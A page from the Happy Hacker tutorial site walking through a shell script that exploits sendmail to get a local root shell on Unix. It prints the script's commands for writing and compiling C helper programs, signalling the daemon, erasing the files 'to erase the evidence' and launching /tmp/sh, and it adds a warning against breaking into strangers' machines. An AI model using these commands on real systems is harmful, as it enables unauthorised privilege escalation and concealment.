What's New!

Chat with
Hackers

How to Defend
Your Computer 

The Guides
to (mostly) 
Harmless Hacking

Happy Hacker 
Digests (old stuff) 

Hacker Links 

Hacker
Wargames 

Meet the 
Happy Hacksters 

Help for 
Beginners 

Hacker 
Bookstore 

Humor 

It Sucks 
to Be Me!

How to Commit
Computer Crime (not)! 

What Is a 
Hacker, Anyhow? 

Have a 
Great Life! 

News from the 
Hacker War Front

Shell Programming: an Exploit Explained, continued...

        Now save it as s.sh.  The "sh" at the end of the name tells you it is a shell script. After saving it, be sure to make it executable by giving the command "chmod 700 s.sh".  That means only you (or someone in your shell account) can run this program.  If you want anyone to be able to run it, give the command "chmod 777".

        What does this cute little shell script do?  It writes C programming language commands into two files, "leshka.c" and "smtpd.c", puts them in the right directories on your computer, compiles them, makes them executable, runs them, then erases them, then prompts the user to enter his or her brand new Unix shell, "/tmp/sh", inside of which the user will discover he or she is root (the superuser with control over the entire victim computer).

        Let's take this program apart so we understand how it does its thing. 

1) It writes two c programs.  For example, the file leshka.c is written withthe shell commands:

echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c

 

2) Next the script compiles both c programs:

cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c

 

        Note that you must know the command to run the C compiler on that computer.If the C compiler command is "gcc", then substitute "gcc" for "cc" in this line of the shell script.

        You also must know the path to sendmail. Check it with the command "whereissendmail". If it has a different path than "/usr/sbin/sendmail," you mustsubstitute the correct path.  

3) Next this shell script runs shell commands to run the exploit:

kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"

"\n"|head -n 1`

 

4) It takes an instant to erase the evidence:

rm leshka.c leshka smtpd.c /tmp/smtpd

5) Then it sends a message to the screen:

echo "Now type:   /tmp/sh"

        That reminds you to give the command /tmp/sh to get into your own private root shell.  You have to do this quickly because this exploit only lets you get into a root shell for a short time.

==========================================================

You can get punched in the nose warning:  When you are root it is really easy to mess things up.  Even if you have permission to be root, be careful! If a friend gave you permission to break into his computer, just think how he will feel if he has to reinstall his operating system because you hit a wrong key or two!

This is a good reason not to break into a stranger's computer. You may think you are quietly, harmlessly sneaking around, when, boom, you accidentally trash things.

===========================================================

(You can learn much more about how this exploit works on the GTMHH on how to program in C.)

More shell programming --->>


Carolyn's most
popular book,
in 4th edition now!
For advanced
hacker studies,
read Carolyn's
Google Groups
Subscribe to Happy Hacker
Email:
Visit this group

 

Return to the index of Guides to (mostly) Harmless Hacking!

 © 2013 Happy Hacker All rights reserved.